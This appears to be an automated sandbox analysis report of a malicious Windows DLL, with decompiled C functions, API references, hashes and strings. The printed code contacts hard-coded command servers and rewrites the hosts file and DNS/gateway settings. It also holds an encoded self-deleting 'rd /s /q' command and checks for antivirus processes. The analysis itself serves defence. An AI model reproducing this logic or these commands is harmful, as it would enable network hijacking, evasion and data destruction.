CreateThread.KERNEL32(00000000,00000000,10006A7F,00000000,00000000,00000000), ref: 100087E2
Sleep.KERNEL32(00001388,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087E9
CreateThread.KERNEL32(00000000,00000000,1000842D,00000000,00000000,00000000), ref: 100087F5
Sleep.KERNEL32(000000FF,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087F9
Sleep.KERNEL32(0036EE80,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008801
wsprintfA.USER32 ref: 10008835
Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008856

Strings

SeDebugPrivilege, xrefs: 1000869E
Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008821
F896SD5DAE, xrefs: 10008671
107.163.56.251:6658, xrefs: 10008747
123, xrefs: 100086D2

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: CreateThread$Sleep$wsprintf
String ID: 107.163.56.251:6658$123$F896SD5DAE$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
API String ID: 2554219641-707305509
Opcode ID: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
Instruction ID: 562cb21c62d1d749736fc9fe061952e86694a01f598b035fd930608b54173050
Opcode Fuzzy Hash: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
Instruction Fuzzy Hash: 8B51BEE150435CBEF710E7788CC5EBB3A9CEF442D9F11092AF255A508ADFB4AD408A76

Uniqueness

Uniqueness Score: -1.00%

Function 100053B7 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E100053B7(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
				intOrPtr _v8;
				void _v71;
				char _v72;
				void _v331;
				char _v332;
				void _v591;
				char _v592;
				void _v851;
				char _v852;
				void _v4947;
				signed char _v4948;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t82;
				int _t86;
				int _t88;
				CHAR* _t104;
				void* _t118;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				CHAR* _t132;
				CHAR* _t136;
				CHAR* _t138;
				intOrPtr _t142;
				signed int _t147;
				signed int _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t168;
				int _t169;
				void* _t170;
				int _t183;
				intOrPtr _t186;
				void* _t198;
				void* _t199;
				void* _t202;
				intOrPtr _t204;
				void* _t205;
				void* _t206;
				signed int _t216;
				void* _t220;

				_t220 = __fp0;
				_t170 = __edx;
				_t144 = __ecx;
				E1000CD20(0x1350, __ecx);
				if(_a12 != 0) {
					_t82 =  *0x10015fb8; // 0x0
					_t202 =  *((intOrPtr*)(_a8 + 0xc)) - _t82;
					_t183 = 0;
					__eflags = 0;
					do {
						_push(_t82 + 0xfffffffe);
						_push(_a4 + _t183);
						_push( *0x10015fc8);
						_t86 = E1000CDA6(_a4 + _t183, _t144, _t170, __eflags);
						_t206 = _t206 + 0xc;
						__eflags = _t86;
						_t82 =  *0x10015fb8; // 0x0
						if(_t86 == 0) {
							_t183 = _t183 + _t82 - 1;
						}
						_t183 = _t183 + 1;
						__eflags = _t183 - _t202;
					} while (__eflags <= 0);
				} else {
					_t204 =  *0x1000e1b8;
					_t142 =  *0x1000e248;
					_t186 =  *((intOrPtr*)(_a8 + 0xc)) -  *0x10015fb8;
					_t4 =  &_a12;
					 *_t4 = _a12 & 0x00000000;
					_t216 =  *_t4;
					_v8 = _t186;
					do {
						_t88 =  *0x10015fb8; // 0x0
						_push(_t88 - 1);
						_push(_a12 + _a4);
						_push( *0x10015fc8);
						_t82 = E1000CDA6(_a4, _a12 + _a4, _t170, _t216);
						_t206 = _t206 + 0xc;
						_t217 = _t82;
						if(_t82 == 0) {
							_v72 = _v72 & _t82;
							_t147 = 0xf;
							memset( &_v71, _t82, _t147 << 2);
							asm("stosw");
							asm("stosb");
							wsprintfA( &_v72, "%s\\%s", 0x100165a4, 0x100165a8);
							_v4948 = _v4948 & 0x00000000;
							memset( &_v4947, 0, 0x3ff << 2);
							asm("stosw");
							asm("stosb");
							E10005318(0, _t217,  &_v4948);
							_v852 = _v852 & 0x00000000;
							_t151 = 0x40;
							_v592 = _v592 & 0x00000000;
							memset( &_v851, 0, _t151 << 2);
							asm("stosw");
							asm("stosb");
							_push(0x40);
							memset( &_v591, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							wsprintfA( &_v852, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
							_push(0x100165a8);
							_t104 = E10001000(0, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz");
							_t155 = 0x100165a4;
							wsprintfA( &_v592, _t104);
							_push(0);
							_push( &_v852);
							E1002B8D2(_t142, _t155, _t170, 0x100165a4, _t204);
							asm("cdq");
							E1000443D( &_v4948, _t142, _t155, _t170,  &_v4948,  &_v592);
							_pop(_t157);
							E10021A45( *_a8 + _a12, _t142, _t157, _t170, 0x100165a4, _t204, _t217);
							_v332 = _v332 & 0x00000000;
							_t158 = 0x40;
							_t118 = memset( &_v331, 0, _t158 << 2);
							asm("stosw");
							asm("stosb");
							0x1003a38c(_t142, 0, _t170,  *0x10015ff4,  *_a8 + _a12,  &_v72, 9, 0);
							E100274E5(_t118, _t142, _t170, _t204, _t205, _t217);
							_t120 = rand();
							asm("cdq");
							_t162 = 0x18;
							_t198 = 0x61;
							_t122 = rand();
							asm("cdq");
							_t163 = 0x19;
							_t124 = rand();
							asm("cdq");
							_t164 = 0x17;
							_t126 = rand();
							asm("cdq");
							_t165 = 0x19;
							_t128 = rand();
							asm("cdq");
							_t166 = 0x18;
							_t130 = rand();
							asm("cdq");
							_t167 = 0x19;
							_t170 = _t130 % _t167 + _t198;
							_t132 = E10001000(_t167, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj");
							_t168 = _t170;
							wsprintfA( &_v332, _t132);
							_t206 = _t206 + 0x8c;
							_t136 =  &_v332;
							0x10036371(0x40000000, 1, 0, 2, 0, 0, _t128 % _t166 + _t198, _t126 % _t165 + _t198, _t124 % _t164 + _t198, _t122 % _t163 + _t198, _t120 % _t162 + _t198, 0, _t118);
							_t199 = _t136;
							_push(_t136);
							_push(_t170);
							E10023C7B(_t136, _t142, _t168, _t199, _t204, 0);
							Sleep(0x3e8);
							_t138 =  &_v332;
							_push(_t138);
							_push(_t138);
							E1002EC87(_t138, _t142, _t168, 0);
							_t169 =  *0x10015fb8; // 0x0
							_t186 = _v8;
							_t82 = _a12 + _t169 - 1;
							_a12 = _t82;
						}
						_a12 = _a12 + 1;
					} while (_a12 <= _t186);
				}
				return _t82;
			}

APIs

wsprintfA.USER32 ref: 10005437

Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0

wsprintfA.USER32 ref: 1000549E
wsprintfA.USER32 ref: 100054BC
PrintFile.ABC(?,?,?,00000000), ref: 100054DE
rand.MSVCRT ref: 1000552A
rand.MSVCRT ref: 10005538
rand.MSVCRT ref: 10005543
rand.MSVCRT ref: 1000554E
rand.MSVCRT ref: 10005559
rand.MSVCRT ref: 10005564
wsprintfA.USER32 ref: 10005582
Sleep.KERNEL32(000003E8,?,00000000,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,?,00000009,00000000,?), ref: 100055AE

Strings

%s\%s, xrefs: 10005431
Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
c:\windows\system32\drivers\%s, xrefs: 10005498

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: rand$InitializeThunkwsprintf$FilePrintSleep
String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
API String ID: 3997227624-455112146
Opcode ID: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
Instruction ID: 64546e9388752df838bc4033515aa0a8afcfc879ecc6bfc3b3dc2cd959c3d1fd
Opcode Fuzzy Hash: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
Instruction Fuzzy Hash: 0D610873A40258BFEB10DB64CC46FDF77ADEB84351F184466F604AB180CBB5EA818A64

Uniqueness

Uniqueness Score: -1.00%

Function 1000721F Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 366
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1000721F(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t141;
				void* _t142;
				intOrPtr* _t150;
				intOrPtr _t151;
				intOrPtr* _t152;
				intOrPtr _t153;
				intOrPtr* _t160;
				intOrPtr _t161;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr _t165;
				intOrPtr* _t170;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t183;
				intOrPtr _t184;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t193;
				intOrPtr* _t194;
				void* _t196;
				signed int _t201;
				intOrPtr _t204;
				void* _t209;
				intOrPtr* _t210;
				intOrPtr _t215;
				intOrPtr* _t226;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr* _t239;
				intOrPtr* _t242;
				intOrPtr* _t245;
				intOrPtr _t256;
				intOrPtr _t260;
				intOrPtr* _t261;
				void* _t266;

				_t307 = __fp0;
				_t272 = __eflags;
				_t254 = __edi;
				_t250 = __edx;
				_t209 = __ebx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__esi);
				E1000774B();
				_push("IPEnabled=TRUE");
				_push("Win32_NetworkAdapterConfiguration");
				 *((intOrPtr*)(_t266 - 4)) = 0;
				if(E100077B2(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t272, __fp0) == 0) {
					L61:
					_t215 = _t266 - 0x7c;
					 *((intOrPtr*)(_t266 - 4)) = 0xb;
					_t141 = E1002A8C6(E10007A27(_t215), _t209, _t215, _t250, _t254, _t266);
					asm("cld");
					 *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) =  *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) - 1;
					asm("adc al, [eax]");
					 *((intOrPtr*)(_t209 + 0x645ef44d)) =  *((intOrPtr*)(_t209 + 0x645ef44d)) + _t215;
					 *0 = _t215;
					return _t141;
				} else {
					_push(__edi);
					 *((intOrPtr*)(_t266 - 0x14)) = 0;
					 *((char*)(_t266 - 4)) = 1;
					if( *((intOrPtr*)(_t266 - 0x68)) != 0) {
						_t201 =  *((intOrPtr*)(_t266 - 0x64)) -  *((intOrPtr*)(_t266 - 0x68));
						_t275 = _t201 & 0xfffffffc;
						if((_t201 & 0xfffffffc) > 0) {
							_push("Index");
							_push(0);
							_push(_t266 - 0x28);
							_t254 = E10007A73(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t275, __fp0);
							_t204 =  *_t254;
							if(_t204 != 0) {
								0x1003afbd(_t254, _t204 + 8);
							}
							E10007696(_t266 - 0x14);
							 *((intOrPtr*)(_t266 - 0x14)) =  *_t254;
							E10007696(_t266 - 0x28);
						}
					}
					_t142 = E1000767F(_t266 - 0x14, _t250);
					_t278 = _t142;
					if(_t142 == 0) {
						L59:
						_t217 =  *((intOrPtr*)(_t266 - 0x14));
						_pop(_t254);
						if( *((intOrPtr*)(_t266 - 0x14)) != 0) {
							E1000515C(_t142, _t217);
							 *((intOrPtr*)(_t266 - 0x14)) = 0;
						}
						goto L61;
					}
					_push(_t209);
					_push("Win32_NetworkAdapterConfiguration.Index=");
					E1000504D(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
					_t219 = _t266 - 0x18;
					_push(_t266 - 0x14);
					 *((char*)(_t266 - 4)) = 2;
					_t142 = E1000762A(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
					_t210 =  *0x1000e218;
					 *((intOrPtr*)(_t266 - 0x10)) = 0;
					 *((intOrPtr*)(_t266 - 0x28)) = 0;
					if( *((intOrPtr*)(_t266 + 8)) != 0) {
						_push( *((intOrPtr*)(_t266 + 8)));
						_t142 = E1000CD02(_t219, 0);
						_t280 = _t142;
						_pop(_t219);
						if(_t142 != 0) {
							_t219 = _t266 - 0x7c;
							_push(_t266 - 0x10);
							_push("SetGateways");
							_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t280, _t307);
							_t281 = _t142;
							if(_t142 >= 0) {
								asm("stosd");
								_t260 = 1;
								 *((intOrPtr*)(_t266 - 0x38)) = 0;
								_push( *((intOrPtr*)(_t266 + 8)));
								 *((intOrPtr*)(_t266 - 0x3c)) = _t260;
								E1000504D(_t210, _t266 - 0x24, _t250, _t260, 0, _t281, _t307);
								_t170 =  *((intOrPtr*)(_t266 - 0x24));
								 *((char*)(_t266 - 4)) = 3;
								_t282 = _t170;
								if(_t170 == 0) {
									_t171 = 0;
									__eflags = 0;
								} else {
									_t171 =  *_t170;
								}
								 *((intOrPtr*)(_t266 - 0x2c)) = _t171;
								_t173 =  *_t210(8, _t260, _t266 - 0x3c);
								_t261 =  *0x1000e230;
								 *((intOrPtr*)(_t266 - 0x1c)) = _t173;
								 *((intOrPtr*)(_t173 + 0xc)) = _t266 - 0x2c;
								 *_t261(_t266 - 0x4c);
								 *((intOrPtr*)(_t266 - 0x44)) =  *((intOrPtr*)(_t266 - 0x1c));
								_t177 = 1;
								 *((short*)(_t266 - 0x4c)) = 0x2008;
								 *((intOrPtr*)(_t266 - 0x30)) = _t177;
								_t178 =  *_t210(3, _t177, _t266 - 0x3c);
								 *((intOrPtr*)(_t266 - 0x20)) = _t178;
								 *((intOrPtr*)(_t178 + 0xc)) = _t266 - 0x30;
								 *_t261(_t266 - 0x5c);
								_push("DefaultIPGateway");
								 *((short*)(_t266 - 0x5c)) = 0x2003;
								 *((intOrPtr*)(_t266 - 0x54)) =  *((intOrPtr*)(_t266 - 0x20));
								_t183 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8, _t250, _t261, 0, _t282, _t307)));
								 *((char*)(_t266 - 4)) = 4;
								_t283 = _t183;
								if(_t183 == 0) {
									_t184 = 0;
									__eflags = 0;
								} else {
									_t184 =  *_t183;
								}
								_t239 =  *((intOrPtr*)(_t266 - 0x10));
								 *((intOrPtr*)( *_t239 + 0x14))(_t239, _t184, 0, _t266 - 0x4c, 0);
								 *((char*)(_t266 - 4)) = 3;
								E10007696(_t266 + 8);
								_push("GatewayCostMetric");
								_t188 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8,  *_t239, _t266 - 0x4c, 0, _t283, _t307)));
								 *((char*)(_t266 - 4)) = 5;
								_t284 = _t188;
								if(_t188 == 0) {
									_t189 = 0;
									__eflags = 0;
								} else {
									_t189 =  *_t188;
								}
								_t242 =  *((intOrPtr*)(_t266 - 0x10));
								 *((intOrPtr*)( *_t242 + 0x14))(_t242, _t189, 0, _t266 - 0x5c, 0);
								 *((char*)(_t266 - 4)) = 3;
								E10007696(_t266 + 8);
								_push("SetGateways");
								_t193 =  *((intOrPtr*)(E1000504D(_t210, _t266 - 0x34,  *_t242, _t266 - 0x5c, 0, _t284, _t307)));
								 *((char*)(_t266 - 4)) = 6;
								if(_t193 == 0) {
									 *((intOrPtr*)(_t266 + 8)) = 0;
								} else {
									 *((intOrPtr*)(_t266 + 8)) =  *_t193;
								}
								_t194 =  *((intOrPtr*)(_t266 - 0x18));
								if(_t194 == 0) {
									_t250 = 0;
									__eflags = 0;
								} else {
									_t250 =  *_t194;
								}
								_t254 = _t266 - 0x28;
								_t245 =  *((intOrPtr*)(_t266 - 0x78));
								_t196 =  *((intOrPtr*)( *_t245 + 0x60))(_t245, _t250,  *((intOrPtr*)(_t266 + 8)), 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t254, 0);
								_t246 =  *((intOrPtr*)(_t266 - 0x34));
								if( *((intOrPtr*)(_t266 - 0x34)) != 0) {
									E1000515C(_t196, _t246);
								}
								0x10035685(_t254,  *((intOrPtr*)(_t266 - 0x1c)));
								 *_t254();
								_t142 =  *_t254( *((intOrPtr*)(_t266 - 0x20)));
								_t219 =  *((intOrPtr*)(_t266 - 0x24));
								 *((char*)(_t266 - 4)) = 2;
								if( *((intOrPtr*)(_t266 - 0x24)) != 0) {
									_t142 = E1000515C(_t142, _t219);
								}
							}
						}
					}
					if( *((intOrPtr*)(_t266 + 0xc)) == 0) {
						L31:
						if( *((intOrPtr*)(_t266 + 0x10)) == 0) {
							L57:
							_t220 =  *((intOrPtr*)(_t266 - 0x18));
							_pop(_t209);
							if( *((intOrPtr*)(_t266 - 0x18)) != 0) {
								_t142 = E1000515C(_t142, _t220);
								 *((intOrPtr*)(_t266 - 0x18)) = 0;
							}
							goto L59;
						}
						_push( *((intOrPtr*)(_t266 + 0x10)));
						_t142 = E1000CD02(_t219, 0);
						_t292 = _t142;
						if(_t142 == 0) {
							goto L57;
						}
						L33:
						_push(_t266 - 0x10);
						_push("SetDNSServerSearchOrder");
						_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t292, _t307);
						_t293 = _t142;
						if(_t142 >= 0) {
							_push( *((intOrPtr*)(_t266 + 0xc)));
							asm("stosd");
							asm("stosd");
							asm("stosd");
							 *((intOrPtr*)(_t266 - 0x58)) = 0;
							 *((intOrPtr*)(_t266 - 0x5c)) = 2;
							E1000504D(_t210, _t266 + 0xc, _t250, _t266 - 0x58, 0, _t293, _t307);
							_push( *((intOrPtr*)(_t266 + 0x10)));
							 *((char*)(_t266 - 4)) = 7;
							E1000504D(_t210, _t266 + 8, _t250, _t266 - 0x58, 0, _t293, _t307);
							_t150 =  *((intOrPtr*)(_t266 + 0xc));
							 *((char*)(_t266 - 4)) = 8;
							if(_t150 == 0) {
								_t151 = 0;
								__eflags = 0;
							} else {
								_t151 =  *_t150;
							}
							 *((intOrPtr*)(_t266 - 0x3c)) = _t151;
							_t152 =  *((intOrPtr*)(_t266 + 8));
							_t295 = _t152;
							if(_t152 == 0) {
								_t153 = 0;
								__eflags = 0;
							} else {
								_t153 =  *_t152;
							}
							 *((intOrPtr*)(_t266 - 0x38)) = _t153;
							_t256 =  *_t210(8, 1, _t266 - 0x5c);
							 *((intOrPtr*)(_t256 + 0xc)) = _t266 - 0x3c;
							 *0x1000e230(_t266 - 0x4c);
							_push("DNSServerSearchOrder");
							 *((short*)(_t266 - 0x4c)) = 0x2008;
							 *((intOrPtr*)(_t266 - 0x44)) = _t256;
							_t160 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t250, _t256, 0, _t295, _t307)));
							 *((char*)(_t266 - 4)) = 9;
							if(_t160 == 0) {
								_t161 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t160;
							}
							_t226 =  *((intOrPtr*)(_t266 - 0x10));
							_t257 = _t266 - 0x4c;
							_t251 =  *_t226;
							_t162 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, _t161, 0, _t266 - 0x4c, 0);
							_t227 =  *((intOrPtr*)(_t266 + 0x10));
							 *((char*)(_t266 - 4)) = 8;
							_t297 =  *((intOrPtr*)(_t266 + 0x10));
							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
								E1000515C(_t162, _t227);
							}
							_push("SetDNSServerSearchOrder");
							_t164 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t251, _t257, 0, _t297, _t307)));
							 *((char*)(_t266 - 4)) = 0xa;
							if(_t164 == 0) {
								_t165 = 0;
								__eflags = 0;
							} else {
								_t165 =  *_t164;
							}
							_t229 =  *((intOrPtr*)(_t266 - 0x18));
							if(_t229 == 0) {
								_t250 = 0;
								__eflags = 0;
							} else {
								_t250 =  *_t229;
							}
							_t230 =  *((intOrPtr*)(_t266 - 0x78));
							_t142 =  *((intOrPtr*)( *_t230 + 0x60))(_t230, _t250, _t165, 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t266 - 0x28, 0);
							_t231 =  *((intOrPtr*)(_t266 + 0x10));
							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
								_t142 = E1000515C(_t142, _t231);
								 *((intOrPtr*)(_t266 + 0x10)) = 0;
							}
							_t232 =  *((intOrPtr*)(_t266 + 8));
							if( *((intOrPtr*)(_t266 + 8)) != 0) {
								_t142 = E1000515C(_t142, _t232);
								 *((intOrPtr*)(_t266 + 8)) = 0;
							}
							_t233 =  *((intOrPtr*)(_t266 + 0xc));
							if( *((intOrPtr*)(_t266 + 0xc)) != 0) {
								_t142 = E1000515C(_t142, _t233);
								 *((intOrPtr*)(_t266 + 0xc)) = 0;
							}
						}
						goto L57;
					}
					_push( *((intOrPtr*)(_t266 + 0xc)));
					_t142 = E1000CD02(_t219, 0);
					_pop(_t219);
					if(_t142 != 0) {
						goto L33;
					}
					goto L31;
				}
			}

APIs

SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007349
VariantInit.OLEAUT32(?), ref: 1000735E
SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007379
VariantInit.OLEAUT32(?), ref: 10007388

Part of subcall function 10007A73: VariantInit.OLEAUT32(?), ref: 10007AB2

SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007516
VariantInit.OLEAUT32(?), ref: 10007524

Strings

DNSServerSearchOrder, xrefs: 1000752A
Win32_NetworkAdapterConfiguration.Index=, xrefs: 100072B8
GatewayCostMetric, xrefs: 100073CF
SetGateways, xrefs: 10007302, 10007408
SetDNSServerSearchOrder, xrefs: 100074AC, 10007570
Win32_NetworkAdapterConfiguration, xrefs: 1000723C
Index, xrefs: 1000726E
IPEnabled=TRUE, xrefs: 10007237
DefaultIPGateway, xrefs: 1000738D

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitVariant$ArrayCreateSafe
String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=
API String ID: 2640012081-1668994663
Opcode ID: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
Instruction ID: e82695035937c1bda44e76a486134160da36d7b78c3243b38af4a6a2dd8dd1e6
Opcode Fuzzy Hash: e2ec7862cb05a4d9f0d12a737e0be0343bc246c2bcf18d74e35b6fadba54feab
Instruction Fuzzy Hash: 7AD14C70D00219EFEB15CFA4C8809EEBBB8FF49781F104019F519AB259DB75AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006EEF Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 174
sleeplibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E10006EEF() {
				signed int _v8;
				void _v267;
				signed char _v268;
				void _v527;
				signed char _v528;
				void _v783;
				signed char _v784;
				void _v1807;
				signed char _v1808;
				void _v5903;
				signed char _v5904;
				void* _t53;
				void* _t65;
				signed int _t76;
				signed int _t90;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t100;
				void* _t102;
				void* _t109;
				signed int _t110;
				void* _t117;
				void* _t118;
				signed int _t130;
				intOrPtr* _t132;
				void* _t134;
				char** _t135;
				char** _t138;
				char** _t140;
				void* _t143;
				void* _t146;

				E1000CD20(0x170c, _t96);
				_push(_t94);
				_t132 = E10001000(_t96, _t143, _t146, "QVNEU3ZjLmV4ZQ==");
				 *_t135 = "QVlSVFNydi5heWU=";
				_t118 = E10001000(_t96, _t143, _t146, _t117);
				L1:
				if(E1000591C(_t132) != 0 || E1000591C(_t118) != 0) {
					Sleep(0xea60);
					goto L1;
				}
				_v268 = _v268 & 0x00000000;
				_t100 = 0x40;
				_v528 = _v528 & 0x00000000;
				memset( &_v267, 0, _t100 << 2);
				asm("stosw");
				asm("stosb");
				__eflags = 0;
				_t102 = 0x40;
				_t53 = memset( &_v527, 0, 0 << 2);
				asm("stosw");
				E100268BC(_t53,  &_v527 + _t102);
				asm("stosb");
				 *_t132( &_v268, 0x104, _t53);
				 *_t132( &_v528, 0x104);
				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3Rz"));
				E1000CD08(0,  &_v268);
				_push(E10001000(0, __eflags, _t146, "XGRyaXZlcnNcZXRjXGhvc3RzLmljcw=="));
				_t65 = E1000CCAE(E1000CD08(0,  &_v528), _t94, 0, _t116, 0x104, 0x80000, _t134, __eflags, _t146, 0x80000);
				_t138 =  &(_t135[0xd]);
				_t95 = _t65;
				while(1) {
					_v1808 = _v1808 & 0x00000000;
					memset( &_v1807, 0, 0xff << 2);
					_v784 = _v784 & 0x00000000;
					asm("stosw");
					asm("stosb");
					memset( &_v783, 0, 0 << 2);
					_t140 =  &(_t138[6]);
					asm("stosw");
					asm("stosb");
					__eflags = E10005C4C( &_v784, 0x100);
					_t109 = 0x3f;
					if(__eflags == 0) {
						_push("http://107.163.56.232:18963/main.php");
					} else {
						_push( &_v784);
					}
					_push("%s");
					_push( &_v1808);
					E10003EF4();
					_push(0x80000);
					_push(0);
					E1000CCFC(_t95, _t109, 0x80000, _t134, __eflags, _t95);
					_t76 = E100061BD(_t109, 0x80000, __eflags, _t146,  &_v1808, _t95, 0x80000);
					_t138 =  &(_t140[9]);
					__eflags = _t76 - 7;
					_v8 = _t76;
					if(__eflags > 0) {
						goto L11;
					}
					_push("iOffset");
					_push("c:\\1.txt");
					L10004139(_t109, _t116, __eflags, _t146);
					L10:
					Sleep( *0x10012500);
					continue;
					L11:
					_t110 = 0;
					__eflags = _t76;
					if(_t76 <= 0) {
						L16:
						_push(_t95);
						__eflags = E1000CD02(_t110, 0x80000) - 0x10;
						if(__eflags <= 0) {
							wsprintfA(0x10016ae0, "%s", _t95);
							_v5904 = _v5904 & 0x00000000;
							memset( &_v5903, 0, 0x3ff << 2);
							asm("stosw");
							asm("stosb");
							E10005318(0, __eflags,  &_v5904);
							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v268);
							E1000443D( &_v5904, _t95, 0, _t116,  &_v5904,  &_v528);
							_push(_t95);
							_push(0x10016ae0);
							E1000CDF2(0x80000);
							_t138 =  &(_t138[0xd]);
						}
						goto L10;
					} else {
						goto L12;
					}
					do {
						L12:
						_t90 = _t110;
						asm("cdq");
						_t130 = 2;
						_t116 = _t90 % _t130;
